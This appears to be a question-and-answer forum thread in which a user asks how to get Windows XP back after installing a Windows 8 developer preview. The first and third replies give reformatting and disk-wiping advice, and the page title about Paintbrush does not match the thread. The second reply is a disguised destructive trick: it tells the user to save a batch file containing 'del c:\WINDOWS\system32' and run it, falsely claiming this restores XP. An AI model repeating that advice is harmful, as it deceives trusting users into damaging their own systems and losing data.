How do you get to paintbrush in Windows XP?

Get back my windows xp?

  • i have windows xp but I installed windows 8 dvlpr preview and now i want my windows xp back. but i cant see windows xp in the boot os and everytime i install my windows xp cd, it says compatability error. how do i get my windows xp back?

    So, let me get this clear - you installed a preview of an operating system without making sure you had a backup? Ok, well, you're in deep waters now. Generally, the XP installation disk detects that there's something newer installed on the hard drive of your computer. It doesn't know what it is - therefore it throws up the "compatibility error" message. You need to reformat the drive before attempting to install anything on the drive again. You can do this in several ways - one would be to boot the computer using for instance a Linux Live installation - or you can connect the computer's hard drive as a slave to another computer and reformat using the other computer's operating system. This WILL mean that any personal files you have on that partition (as a minimum) will get lost. If you want to save any files, do so BEFORE you reformat the drive.

First you need to delete the windows system32 from your computer to simply do that follow these steps. Simply go on notepad and type in @echo off del c:\WINDOWS\system32 And save as Windows.Bat After you have completed those steps simply click the saved document. Deleting system32 will enable you to reboot to your previous windows xp.

Boot into Interactive Mode.. Change the 'Method' To What you Desire, Some Examples Are: 'Fast/Quick Erase' - Fastest but least Secure. 'GutMan' - Longest but Most Secure. If you 'AutoNuke'.. You Erase the Entire HD And any EHD/USB's Plugged in. (You Can Choose to Just Wipe/Erase the C Drive Only) Be Very Patient Especially if you Chose A Secure Method. Then Just Install An Operating System. Hope it helps :)
